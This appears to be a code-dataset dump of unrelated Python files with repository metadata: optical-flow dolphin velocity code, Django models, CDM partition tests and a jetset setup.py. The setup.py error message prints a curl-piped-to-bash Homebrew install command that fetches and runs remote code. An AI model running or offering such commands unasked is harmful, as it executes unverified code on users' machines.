Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[np.ndarray], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position >= offset
cap = cv2.VideoCapture(str(file))
fps = cap.get(cv2.CAP_PROP_FPS)
cap.set(cv2.CAP_PROP_POS_FRAMES, position-offset)
_, frame = cap.read()
frame0 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position)
_, frame = cap.read()
frame1 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position+offset)
_, frame = cap.read()
frame2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return [frame0, frame1, frame2], [position - offset, position, position + offset], fps
def cropFrames(frames: List[pims.frame.Frame], box: List[int]) -> List[pims.frame.Frame]:
"""Crop frames.
Parameters
----------
frames : List[pims.frame.Frame]
List of frames to be cropped
box : List[int]
Dimensions, and location to crop: format [y0, x0, y1, x1]
Returns
-------
List[pims.frame.Frame]
List of cropped frames
"""
croppedFrames = []
xi = box[1]
xii = box[3]
yi = box[0]
yii = box[2]
for frame in frames:
croppedFrames.append(frame[yi:yii, xi:xii])
return croppedFrames
def preprocessFrame(frame: pims.frame.Frame, fg) -> Tuple[np.ndarray]:
"""Preprocess frame. Converts to grayscale and removes noise.
Parameters
----------
frame : pims.frame.Frame
Frame to be preprocessed
fg : TYPE
Foreground remover?
Returns
-------
Tuple[np.ndarray]
Dilated image binary image, and grayscale image
"""
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
fgmask = fg.apply(gray)
blur = cv2.GaussianBlur(fgmask, (5, 5), 0)
_, thesh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thesh, None, iterations=3)
return dilated, gray
def processContours(contours: List[float], contourpoints: List[List[float]], frame: pims.frame.Frame, debug=False) -> Tuple[List[List[float]], pims.frame.Frame]:
"""Get bounding boxes for each contour.
Parameters
----------
contours : List[float]
List of contours to find bounding boxes for.
contourpoints : List[List[float]]
List of bounding boxes. Does this need passed in?
frame : pims.frame.Frame
Frame from which the contours are from
debug : bool, optional
If true then draw bounding boxes
Returns
-------
Tuple[List[List[float]], pims.frame.Frame]
List of bounding boxes, and frame
"""
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cx = x + (w / 2)
cy = y + (h / 2)
contourpoints.append([cx, cy])
if debug:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
return contourpoints, frame
def processFile(file: str) -> List[Union[str, int, List[float], int]]:
"""Open, read and process data from file.
Parameters
----------
file : str
File to read.
Returns
-------
List[Union[str, int, List[float], int]]
List of videoname, framenumber, bounding box, and label
"""
info = []
f = open(file, "r")
lines = f.readlines()[1:]
for line in lines:
name, framenum, *box, label, vel, kmeans, hdbscan = line.split(",")
framenum = int(framenum)
label = int(label)
box = [int(x) for x in box]
item = [name, framenum, box, label]
info.append(item)
return info
def trainParallel(workers=8):
"""Wrapper function for training HDBSCAN in parallel.
Parameters
----------
workers : int, optional
Number of workers to use in parallel, default=2
"""
data = processFile("../data/train.csv")
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data), total=len(data)))
velocities = []
for i in res:
velocities.extend(i)
# with open('velocities.npy', 'wb') as f:
# np.save(f, velocities)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, cluster_selection_epsilon=0.2, min_samples=5, leaf_size=100, prediction_data=True).fit(np.array(velocities).reshape(-1, 1))
# import pickle
# with open('model.pickle', 'wb') as f:
# pickle.dump(model, f)
def train(info: Tuple[str, List[float], int], root="/data/lm959/data/", crop=False):
"""Training function for HDBSCAN. Actually does the optical flow and
returns the data needed for training.
Parameters
----------
info : Tuple[str, List[float], int]
Tuple of video filename, framenumber, bounding box of object, and label of object.
root : str, optional
Root of file system location where videos are stored.
crop : bool, optional
If true then crop frames to bounding box of object.
Returns
-------
velocitymeterPerSecond : np.ndarray
List of velocities in m/s
"""
lk_params = dict(winSize=(15, 15),
maxLevel=2,
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
fgbg = cv2.createBackgroundSubtractorMOG2()
root = Path(root)
videoFiles = list(root.glob("**/*.mp4"))
vidname, fnumber, box, label = info
fullname = _getFullFileName(videoFiles, vidname)
frames, framenums, fps = getFramesCV2(fullname, fnumber, offset=15)
contourpoints = []
fpsPerFrame = 1. / fps
alt = getAltitude(fullname, framenums[1], gpsdataPath="../data/gps/")
magn = getMagnification(frames[1])
dolphLength = 1714 * (magn / alt) + 16.5
dolphPixelPerSecond = dolphLength / 2.
if crop:
frames = cropFrames(frames, box)
frame = frames[0]
for i in range(0, 2):
dilated, gray1 = preprocessFrame(frame, fgbg)
contours, _ = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contourpoints, frame = processContours(contours, contourpoints, frame)
p0 = np.array(contourpoints, np.float32)
gray2 = cv2.cvtColor(frames[i + 1], cv2.COLOR_RGB2GRAY)
try:
p1, _, _ = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **lk_params)
diff = np.array(p1) - np.array(p0)
velocity = diff / fpsPerFrame
velocity = [np.sqrt(item[0]**2 + item[1]**2) for item in velocity]
frame = frames[1].copy()
contourpoints = []
except:
# velocity = np.array([0.])
# if not crop:
continue
velocitymeterPerSecond = velocity / dolphPixelPerSecond
return velocitymeterPerSecond
def calcLabels():
"""Summary
"""
from sklearn.cluster import KMeans
data = processFile("../data/train.csv")
data = data
workers = 8
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data, repeat("/data/lm959/data/"), repeat(True)), total=len(data)))
with open('velocities.npy', "rb") as f:
arrays = np.load(f)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, min_samples=5, leaf_size=100, prediction_data=True).fit(arrays.reshape(-1, 1))
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
model = KMeans(n_clusters=6, random_state=0, max_iter=300, precompute_distances=True, algorithm='full').fit(np.array(TotalVelocity).reshape(-1, 1))
outshizz = []
for i, item in enumerate(res):
vels = np.mean(item)
test_labels = model.predict(vels.reshape(-1, 1))
tmp = [data[i][0], data[i][1], data[i][2][0], data[i][2][1], data[i][2][2], data[i][2][3], data[i][3], vels, test_labels[0]]
outshizz.append(tmp)
with open('train-data-kmeans.npy', 'wb') as f:
np.save(f, np.array(outshizz))
# def infer(vels, tmper):
# import pickle
# with open('model.pickle', "rb") as f:
# loaded_obj = pickle.load(f)
# test_labels, strengths = hdbscan.approximate_predict(loaded_obj, np.array(vels).reshape(-1, 1))
def elbowPlot():
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
with open('velocities.npy', "rb") as f:
arrays = np.load(f)
scaler = StandardScaler()
TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
inertia = []
for i in range(1, 15):
print(i)
km = KMeans(n_clusters=i, random_state=0, max_iter=300, precompute_distances=True, algorithm='full')
km.fit(np.array(TotalVelocity).reshape(-1, 1))
inertia.append(km.inertia_)
# results = trainParallel(workers=6)
# calcLabels()
# elbowPlot()
| 28.29156
| 176
| 0.626831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,380
| 0.39595
|
7c088d45f5f62ebef1ceafec95293618d4108e74
| 390
|
py
|
Python
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 2
|
2020-05-13T12:55:01.000Z
|
2020-07-24T06:52:49.000Z
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 1
|
2020-05-22T09:03:04.000Z
|
2020-05-22T09:31:45.000Z
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 2
|
2020-07-21T00:54:09.000Z
|
2020-10-29T18:10:03.000Z
|
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
import scrapy
class ExampleSpider(scrapy.Spider):
"""ExampleSpider
Auto generated by os-scrapy-cookiecuter
Run:
scrapy crawl example
"""
name = "example"
start_urls = ["http://example.com/"]
| 19.5
| 79
| 0.697436
| 211
| 0.541026
| 0
| 0
| 0
| 0
| 0
| 0
| 294
| 0.753846
|
7c094dc9f6789987096d646f2920ee372eb6f1b8
| 3,409
|
py
|
Python
|
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.dispatch import receiver
import os
import shutil
class Folder(models.Model):
name = models.CharField(max_length=128)
parent_folder = models.ForeignKey("self", null=True, blank=True, on_delete=models.CASCADE)
def __str__(self):
return f'{self.name}'
class Tag(models.Model):
name = models.CharField(max_length=128)
def __str__(self):
return f'{self.name}'
def upload_to(instance, filename):
upload_to = ""
if instance.folder:
upload_to = instance.folder.name + "/"
instance = instance.folder
while True:
if not instance.parent_folder:
break
upload_to = instance.parent_folder.name + "/" + upload_to
instance = instance.parent_folder
return "files/" + upload_to + filename
class Document(models.Model):
title = models.CharField(max_length=128)
docfile = models.FileField(upload_to=upload_to)
TYPES = (
('PDF', 'Pdf'),
('IMG', 'Image'),
('XLS', 'Excel'),
('DOCX', 'Docx'),
('TXT', 'Text')
)
doctype = models.CharField(max_length=128, choices=TYPES)
description = models.TextField(max_length=250, blank=True)
created = models.DateTimeField(editable=False)
updated = models.DateTimeField(editable=False)
folder = models.ForeignKey(Folder, null=True, blank=True, on_delete=models.CASCADE)
tags = models.ManyToManyField(Tag)
def save(self, *args, **kwargs):
''' On save, update timestamps '''
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(Document, self).save(*args, **kwargs)
def __str__(self):
return f'{self.title}'
@receiver(models.signals.post_delete, sender=Document)
def auto_delete_file_on_delete(sender, instance, **kwargs):
"""
Deletes file from filesystem
when corresponding `Document` object is deleted.
"""
if instance.docfile:
if os.path.isfile(instance.docfile.path):
os.remove(instance.docfile.path)
@receiver(models.signals.pre_save, sender=Document)
def auto_delete_file_on_change(sender, instance, **kwargs):
"""
Deletes old file from filesystem
when corresponding `Document` object is updated
with new file.
"""
if not instance.pk:
return False
try:
old_file = Document.objects.get(pk=instance.pk).docfile
except Document.DoesNotExist:
return False
new_file = instance.docfile
if not old_file == new_file:
if os.path.isfile(old_file.path):
os.remove(old_file.path)
@receiver(models.signals.pre_save, sender=Document)
def auto_move_file_on_update(sender, instance, **kwargs):
"""
Move old file from filesystem
when corresponding `Document` object is updated
with new folder.
"""
if not instance.pk:
return False
try:
old_file = Document.objects.get(pk=instance.pk).docfile
old_folder = Document.objects.get(pk=instance.pk).folder
except Document.DoesNotExist:
return False
new_folder = instance.folder
if not old_folder == new_folder:
new_path = upload_to(instance, os.path.basename(old_file.path))
shutil.move(old_file.path, new_path)
| 29.903509
| 94
| 0.661484
| 1,272
| 0.37313
| 0
| 0
| 1,549
| 0.454385
| 0
| 0
| 490
| 0.143737
|
7c0a7ee8a1d12afb4a736f3531f18c61cfd4058f
| 100
|
py
|
Python
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | 1
|
2021-03-11T22:18:56.000Z
|
2021-03-11T22:18:56.000Z
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
def is_success(code):
return code == 'ok'
def is_error_code(code):
return code == 'ERROR'
| 14.285714
| 26
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.11
|
7c0d4593b55079c9f02350a49f16e7cc7ca276e1
| 2,435
|
py
|
Python
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 2
|
2021-04-20T17:30:37.000Z
|
2021-11-28T01:03:27.000Z
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 2
|
2021-04-15T14:16:10.000Z
|
2021-04-16T16:45:58.000Z
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 4
|
2021-04-15T14:11:10.000Z
|
2021-08-10T19:19:46.000Z
|
# ***************************************************************** #
# #
# (C) Copyright IBM Corp. 2021 #
# #
# SPDX-License-Identifier: Apache-2.0 #
# #
# ***************************************************************** #
from abc import ABC, abstractmethod
import inspect
from fastapi import Request
from acd_annotator_python.container_model.main import UnstructuredContainer
from acd_annotator_python.container_model.main import StructuredContainer
class ACDAnnotator(ABC):
def __init_subclass__(cls, **kwargs):
"""
Make sure that any subclass that inherits ACDAnnotator
defines is_healthy() and annotate() as coroutines (with the async keyword).
This can lead to hard-to-track-down errors, so we'll do this check up front.
:param arg:
:param kwargs:
"""
super().__init_subclass__(**kwargs)
child_method = getattr(cls, "is_healthy")
assert inspect.iscoroutinefunction(child_method), f'The method {child_method} must be a coroutine ("async def")'
child_method = getattr(cls, "annotate")
assert inspect.iscoroutinefunction(child_method), f'The method {child_method} must be a coroutine ("async def")'
@abstractmethod
def on_startup(self, app):
"""Load any required resources when the server starts up. (Not async to allow io operations)"""
...
@abstractmethod
async def is_healthy(self, app):
"""Is this annotator healthy? This gives the annotator a chance to indicate that
resources failed to load correctly, etc."""
...
async def annotate(self, unstructured_container: UnstructuredContainer, request: Request):
"""
Apply annotator logic to the unstructured container, altering it in-place.
:param unstructured_container:
:param request:
:return:
"""
pass
async def annotate_structured(self, structured_container: StructuredContainer, request: Request):
"""
Apply logic to a structured container altering it in-place.
:param structured_container:
:param request:
:return:
"""
pass
| 39.918033
| 120
| 0.561396
| 1,711
| 0.702669
| 0
| 0
| 367
| 0.150719
| 755
| 0.310062
| 1,485
| 0.609856
|
9fd0cbfeb51abe9f235403600ea433496b7820f2
| 14,396
|
py
|
Python
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 265
|
2018-03-04T04:47:50.000Z
|
2019-05-06T13:31:18.000Z
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 39
|
2018-03-21T16:57:12.000Z
|
2019-05-06T17:30:23.000Z
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 75
|
2018-03-09T20:33:13.000Z
|
2019-05-05T06:55:43.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.utilities.logging import logger
from cdm.enums import CdmObjectType, CdmStatusLevel, CdmIncrementalPartitionType
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmManifestDefinition, CdmEntityDefinition
from cdm.persistence.cdmfolder import ManifestPersistence
from cdm.persistence.cdmfolder.types import ManifestContent
from cdm.utilities import Constants
from tests.cdm.cdm_collection.cdm_collection_helper_functions import create_document_for_entity
from tests.common import async_test, TestHelper
class DataPartitionTest(unittest.TestCase):
test_subpath = os.path.join('Persistence', 'CdmFolder', 'DataPartition')
@async_test
async def test_load_local_entitiy_with_data_partition(self):
content = TestHelper.get_input_file_content(self.test_subpath, 'test_load_local_entity_with_data_partition', 'entities.manifest.cdm.json')
manifest_content = ManifestContent()
manifest_content.decode(content)
cdm_manifest = ManifestPersistence.from_object(CdmCorpusContext(CdmCorpusDefinition(), None), 'entities', 'testNamespace', '/', manifest_content)
self.assertEqual(len(cdm_manifest.entities), 1)
self.assertEqual(cdm_manifest.entities[0].object_type, CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF)
entity = cdm_manifest.entities[0]
self.assertEqual(len(entity.data_partitions), 2)
relative_partition = entity.data_partitions[0]
self.assertEqual(relative_partition.name, 'Sample data partition')
self.assertEqual(relative_partition.location, 'test/location')
# self.assertEqual(TimeUtils.GetFormattedDateString(relative_partition.LastFileModifiedTime), '2008-09-15T23:53:23.000Z')
self.assertEqual(len(relative_partition.exhibits_traits), 1)
self.assertEqual(relative_partition.specialized_schema, 'teststring')
test_list = relative_partition.arguments['test']
self.assertEqual(len(test_list), 3)
self.assertEqual(test_list[0], 'something')
self.assertEqual(test_list[1], 'somethingelse')
self.assertEqual(test_list[2], 'anotherthing')
key_list = relative_partition.arguments['KEY']
self.assertEqual(len(key_list), 1)
self.assertEqual(key_list[0], 'VALUE')
self.assertFalse('wrong' in relative_partition.arguments)
absolute_partition = entity.data_partitions[1]
self.assertEqual(absolute_partition.location, "local:/some/test/location")
@async_test
async def test_programmatically_create_partitions(self):
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_programmatically_create_partitions', no_input_and_output_folder=True)
manifest = corpus.make_object(CdmObjectType.MANIFEST_DEF, 'manifest')
entity = manifest.entities.append('entity')
relative_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'relative partition')
relative_partition.location = 'relative/path'
relative_partition.arguments['test1'] = ['argument1']
relative_partition.arguments['test2'] = ['argument2', 'argument3']
absolute_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'absolute partition')
absolute_partition.location = 'local:/absolute/path'
# add an empty arguments list to test empty list should not be displayed in ToData json.
absolute_partition.arguments['test'] = []
entity.data_partitions.append(relative_partition)
entity.data_partitions.append(absolute_partition)
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(len(manifest_data.entities), 1)
entityData = manifest_data.entities[0]
partitions_list = entityData.dataPartitions
self.assertEqual(len(partitions_list), 2)
relative_partition_data = partitions_list[0]
absolute_partition_data = partitions_list[-1]
self.assertEqual(relative_partition_data.location, relative_partition.location)
arguments_list = relative_partition_data.arguments
self.assertEqual(3, len(arguments_list))
checked_arguments = []
for argument in arguments_list:
self.assertEqual(3, len(argument))
checked_arguments.append(argument.value)
if argument.value == 'argument1':
self.assertEqual('test1', argument.name)
elif argument.value == 'argument2':
self.assertEqual('test2', argument.name)
elif argument.value == 'argument3':
self.assertEqual('test2', argument.name)
else:
raise Exception('unexpected argument in data partitions')
self.assertTrue('argument1' in checked_arguments)
self.assertTrue('argument2' in checked_arguments)
self.assertTrue('argument3' in checked_arguments)
self.assertEqual(absolute_partition_data.location, absolute_partition.location)
# test if empty argument list is set to null
self.assertEqual(absolute_partition_data.arguments, None)
@async_test
async def test_from_incremental_partition_without_trait(self):
"""
Testing loading manifest with local entity declaration having an incremental partition without incremental trait.
"""
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_from_incremental_partition_without_trait')
error_message_verified = False
# not checking the CdmLogCode here as we want to check if this error message constructed correctly for the partition (it shares the same CdmLogCode with partition pattern)
def callback(level, message):
if 'Failed to persist object \'DeletePartition\'. This object does not contain the trait \'is.partition.incremental\', so it should not be in the collection \'incremental_partitions\'. | from_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = await corpus.fetch_object_async('local:/entities.manifest.cdm.json')
self.assertEqual(1, len(manifest.entities))
self.assertEqual(CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF, manifest.entities[0].object_type)
entity = manifest.entities[0]
self.assertEqual(1, len(entity.incremental_partitions))
incremental_partition = entity.incremental_partitions[0]
self.assertEqual('UpsertPartition', incremental_partition.name)
self.assertEqual(1, len(incremental_partition.exhibits_traits))
self.assertEqual(Constants._INCREMENTAL_TRAIT_NAME, incremental_partition.exhibits_traits[0].fetch_object_definition_name())
self.assertTrue(error_message_verified)
@async_test
async def test_from_data_partition_with_incremental_trait(self):
"""
Testing loading manifest with local entity declaration having a data partition with incremental trait.
"""
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_from_data_partition_with_incremental_trait')
error_message_verified = False
# not checking the CdmLogCode here as we want to check if this error message constructed correctly for the partition (it shares the same CdmLogCode with partition pattern)
def callback(level, message):
if 'Failed to persist object \'UpsertPartition\'. This object contains the trait \'is.partition.incremental\', so it should not be in the collection \'data_partitions\'. | from_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = await corpus.fetch_object_async('local:/entities.manifest.cdm.json')
self.assertEqual(1, len(manifest.entities))
self.assertEqual(CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF, manifest.entities[0].object_type)
entity = manifest.entities[0]
self.assertEqual(1, len(entity.data_partitions))
self.assertEqual('TestingPartition', entity.data_partitions[0].name)
self.assertTrue(error_message_verified)
@async_test
async def test_to_incremental_partition_without_trait(self):
"""
Testing saving manifest with local entity declaration having an incremental partition without incremental trait.
"""
test_name = 'test_to_incremental_partition_without_trait'
corpus = TestHelper.get_local_corpus(self.test_subpath, test_name)
error_message_verified = False
# not checking the CdmLogCode here as we want to check if this error message constructed correctly for the partition (it shares the same CdmLogCode with partition pattern)
def callback(level, message):
if 'Failed to persist object \'DeletePartition\'. This object does not contain the trait \'is.partition.incremental\', so it should not be in the collection \'incremental_partitions\'. | to_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
corpus.storage.fetch_root_folder('local').documents.append(manifest)
entity = CdmEntityDefinition(corpus.ctx, 'entityName', None)
create_document_for_entity(corpus, entity)
localized_entity_declaration = manifest.entities.append(entity)
upsert_incremental_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'UpsertPartition', False)
upsert_incremental_partition.location = '/IncrementalData'
upsert_incremental_partition.specialized_schema = 'csv'
upsert_incremental_partition.exhibits_traits.append(Constants._INCREMENTAL_TRAIT_NAME, [['type', CdmIncrementalPartitionType.UPSERT.value]])
delete_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'DeletePartition', False)
delete_partition.location = '/IncrementalData'
delete_partition.specialized_schema = 'csv'
localized_entity_declaration.incremental_partitions.append(upsert_incremental_partition)
localized_entity_declaration.incremental_partitions.append(delete_partition)
with logger._enter_scope(DataPartitionTest.__name__, corpus.ctx, test_name):
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(1, len(manifest_data.entities))
entity_data = manifest_data.entities[0]
self.assertEqual(1, len(entity_data.incrementalPartitions))
partition_data = entity_data.incrementalPartitions[0]
self.assertEqual('UpsertPartition', partition_data.name)
self.assertEqual(1, len(partition_data.exhibitsTraits))
self.assertEqual(Constants._INCREMENTAL_TRAIT_NAME, partition_data.exhibitsTraits[0].traitReference)
self.assertTrue(error_message_verified)
@async_test
async def test_to_data_partition_with_incremental_trait(self):
"""
Testing saving manifest with local entity declaration having a data partition with incremental trait.
"""
test_name = 'test_to_data_partition_with_incremental_trait'
corpus = TestHelper.get_local_corpus(self.test_subpath, test_name)
error_message_verified = False
# not checking the CdmLogCode here as we want to check if this error message constructed correctly for the partition (it shares the same CdmLogCode with partition pattern)
def callback(level, message):
if 'Failed to persist object \'UpsertPartition\'. This object contains the trait \'is.partition.incremental\', so it should not be in the collection \'data_partitions\'. | to_data' in message:
nonlocal error_message_verified
error_message_verified = True
else:
self.fail('Some unexpected failure - {}!'.format(message))
corpus.set_event_callback(callback, CdmStatusLevel.WARNING)
manifest = CdmManifestDefinition(corpus.ctx, 'manifest')
corpus.storage.fetch_root_folder('local').documents.append(manifest)
entity = CdmEntityDefinition(corpus.ctx, 'entityName', None)
create_document_for_entity(corpus, entity)
localized_entity_declaration = manifest.entities.append(entity)
upsert_incremental_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'UpsertPartition',
False)
upsert_incremental_partition.location = '/IncrementalData'
upsert_incremental_partition.specialized_schema = 'csv'
upsert_incremental_partition.exhibits_traits.append(Constants._INCREMENTAL_TRAIT_NAME,
[['type', CdmIncrementalPartitionType.UPSERT.value]])
delete_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'TestingPartition', False)
delete_partition.location = '/testingData'
delete_partition.specialized_schema = 'csv'
localized_entity_declaration.data_partitions.append(upsert_incremental_partition)
localized_entity_declaration.data_partitions.append(delete_partition)
with logger._enter_scope(DataPartitionTest.__name__, corpus.ctx, test_name):
manifest_data = ManifestPersistence.to_data(manifest, None, None)
self.assertEqual(1, len(manifest_data.entities))
entity_data = manifest_data.entities[0]
self.assertEqual(1, len(entity_data.dataPartitions))
partition_data = entity_data.dataPartitions[0]
self.assertEqual('TestingPartition', partition_data.name)
self.assertTrue(error_message_verified)
| 56.454902
| 221
| 0.727077
| 13,675
| 0.949785
| 0
| 0
| 13,519
| 0.93895
| 13,423
| 0.932282
| 3,632
| 0.252257
|
9fd1f014c5d5b7866e50185659805f63bd40ebd9
| 6,038
|
py
|
Python
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 16
|
2019-02-11T06:58:43.000Z
|
2021-12-28T13:00:35.000Z
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 14
|
2019-04-14T14:49:55.000Z
|
2021-12-27T04:18:24.000Z
|
setup.py
|
andreatramacere/jetset
|
4b7859622db9713b6ee243e2c12ec81321b372bf
|
[
"BSD-3-Clause"
] | 10
|
2019-02-25T14:53:28.000Z
|
2022-03-02T08:49:19.000Z
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
__author__ = 'andrea tramacere'
from setuptools import setup, find_packages,Extension
# from setuptools.command.install import install
# from distutils.extension import Extension
# import distutils.command.install as orig
from distutils.command.build import build
from setuptools.command.install import install
from distutils.sysconfig import get_python_lib
import os
import glob
import shutil
import fnmatch
import json
import sys
def check_swig():
command = 'swig'
if shutil.which(command) is None:
_mess = """
***********************************************************************************************************
*** you need to install swig v>=3.0.0 to install from source ***
*** ***
*** - on linux Ubuntu: sudo apt-get install swig ***
*** ***
*** - on linux Debian: sudo aptitude install swig ***
*** ***
*** - on linux Fedora: sudo yum install swig ***
*** ***
*** - on mac: ***
*** /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ***
*** brew install swig ***
*** ***
*** visit: http://www.swig.org/ for more info ***
***********************************************************************************************************
"""
raise RuntimeError(_mess)
class CustomBuild(build):
def run(self):
print('-> custom build')
check_swig()
self.run_command('build_ext')
build.run(self)
class CustomInstall(install):
def run(self):
print('-> custom install',self.get_command_name())
check_swig()
self.run_command('build_ext')
install.run(self)
print ('JETSETBESSELBUILD',os.getenv('JETSETBESSELBUILD') == 'TRUE')
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
self.run_command('test')
else:
pass
class CustomClean(install):
def run(self):
try:
shutil.rmtree('dist')
except:
pass
try:
shutil.rmtree('build')
except:
pass
try:
shutil.rmtree(glob.glob('*.egg-info')[0])
except:
pass
try:
os.remove('jetset/jetkernel/jetkernel.py')
except:
pass
try:
os.remove('jetset/jetkernel/jetkernel_wrap.c')
except:
pass
try:
shutil.rmtree('jetset/jetkernel/__pycache__')
except:
pass
# to remove files installed by old versions
site_p=get_python_lib()
for f in glob.glob(site_p+'/*_jetkernel*'):
print ('found .so object:', f)
print ('removing it')
try:
os.remove(f)
except:
pass
custom_cmdclass = {'build': CustomBuild,
'install': CustomInstall,
'clean':CustomClean}
with open('jetset/pkg_info.json') as fp:
_info = json.load(fp)
__version__ = _info['version']
f = open("./requirements.txt",'r')
req=f.readlines()
f.close()
req=[n.strip() for n in req if n.startswith('#') is False]
src_files=['jetset/jetkernel/jetkernel.i']
src_files.extend(glob.glob ('jetkernel_src/src/*.c'))
_module=Extension('jetset.jetkernel/_jetkernel',
sources=src_files,
#extra_compile_options='-fPIC -v -c -m64 -I',
#extra_link_options='-suppress',
swig_opts=['-v','-threads'],
include_dirs=['jetkernel_src/include'])
if os.getenv('JETSETBESSELBUILD') == 'TRUE':
_test_suite = 'jetset.tests.test_build_functions'
else:
_test_suite = None
with open("proj_descr.md", "r") as f:
long_description = f.read()
# this to skip that pip install packages when installing src from conda
is_conda = os.path.exists(os.path.join(sys.prefix, 'conda-meta'))
if is_conda:
install_req=None
else:
install_req=req
print('-> version', __version__, install_req)
setup(name='jetset',
version=__version__,
author='Andrea Tramacere',
